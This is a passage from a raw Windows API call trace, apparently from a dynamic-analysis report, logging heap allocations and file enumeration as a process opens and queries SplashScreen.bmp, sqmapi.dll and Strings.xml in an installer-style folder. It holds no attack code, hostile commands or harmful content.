HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0068.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0068.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0068.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0068.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0068.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0068.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0068.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0068.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0068.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0068.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0068.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0068.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0068.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0068.755] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.755] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.755] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.755] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0068.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0068.755] AreFileApisANSI () returned 1 [0068.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\SplashScreen.bmp", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\SplashScreen.bmp", lpUsedDefaultChar=0x0) returned 39 [0068.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0068.755] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.755] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0068.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0068.755] AreFileApisANSI () returned 1 [0068.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0068.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6d688 [0068.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x6d688, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 39 [0068.756] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SplashScreen.bmp" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.756] GetFileType (hFile=0x410) returned 0x1 [0068.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0068.756] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0068.756] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0068.756] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0068.756] CloseHandle (hObject=0x410) returned 1 [0068.757] AreFileApisANSI () returned 1 [0068.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0068.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6cfa8 [0068.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x6cfa8, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 39 [0068.757] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SplashScreen.bmp" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.757] GetFileType (hFile=0x410) returned 0x1 [0068.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0068.757] CloseHandle (hObject=0x410) returned 1 [0068.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0068.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0068.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0068.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0068.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0068.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0068.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0068.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0068.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0068.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0068.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0068.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0068.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0068.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0068.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0068.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0068.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0068.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0068.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0068.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0068.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0068.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0068.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0068.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0068.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0068.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0068.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0068.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0068.758] AreFileApisANSI () returned 1 [0068.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0068.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6cd98 [0068.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x6cd98, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 39 [0068.758] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\SplashScreen.bmp" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0xa078)) returned 1 [0068.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0068.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0068.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0068.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0068.758] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.758] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.758] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x143bc400, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0x143bc400, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0x143bc400, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x23420, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0068.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0068.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0068.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0068.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0068.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0068.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0068.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0068.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0068.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0068.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0068.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0068.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0068.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0068.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0068.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0068.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0068.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0068.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0068.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0068.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0068.759] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.759] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.759] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.759] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0068.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0068.759] AreFileApisANSI () returned 1 [0068.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\sqmapi.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\sqmapi.dll", lpUsedDefaultChar=0x0) returned 33 [0068.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0068.759] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.759] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0068.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0068.759] AreFileApisANSI () returned 1 [0068.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0068.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x42) returned 0x68d60 [0068.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=33 | out: lpWideCharStr="C:\\588bce7c90097ed212\\sqmapi.dll") returned 33 [0068.760] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\sqmapi.dll" (normalized: "c:\\588bce7c90097ed212\\sqmapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.760] GetFileType (hFile=0x410) returned 0x1 [0068.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0068.760] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0068.760] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0068.760] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0068.760] CloseHandle (hObject=0x410) returned 1 [0068.761] AreFileApisANSI () returned 1 [0068.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0068.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x42) returned 0x693f0 [0068.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x693f0, cchWideChar=33 | out: lpWideCharStr="C:\\588bce7c90097ed212\\sqmapi.dll") returned 33 [0068.761] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\sqmapi.dll" (normalized: "c:\\588bce7c90097ed212\\sqmapi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.761] GetFileType (hFile=0x410) returned 0x1 [0068.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0068.761] CloseHandle (hObject=0x410) returned 1 [0068.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0068.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0068.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0068.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0068.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0068.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0068.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0068.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0068.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0068.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0068.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0068.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0068.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0068.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0068.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0068.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0068.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0068.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0068.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0068.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0068.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0068.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0068.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0068.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0068.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0068.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0068.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0068.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0068.762] AreFileApisANSI () returned 1 [0068.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0068.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x42) returned 0x690d0 [0068.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x690d0, cchWideChar=33 | out: lpWideCharStr="C:\\588bce7c90097ed212\\sqmapi.dll") returned 33 [0068.762] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\sqmapi.dll" (normalized: "c:\\588bce7c90097ed212\\sqmapi.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x143bc400, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0x143bc400, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0x143bc400, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x23420)) returned 1 [0068.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0068.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0068.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0068.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0068.762] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.762] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.762] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x3704, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Strings.xml", cAlternateFileName="")) returned 1 [0068.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0068.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0068.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0068.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0068.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0068.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0068.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0068.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0068.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0068.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0068.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0068.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0068.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0068.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0068.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0068.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0068.763] HeapFree (in: 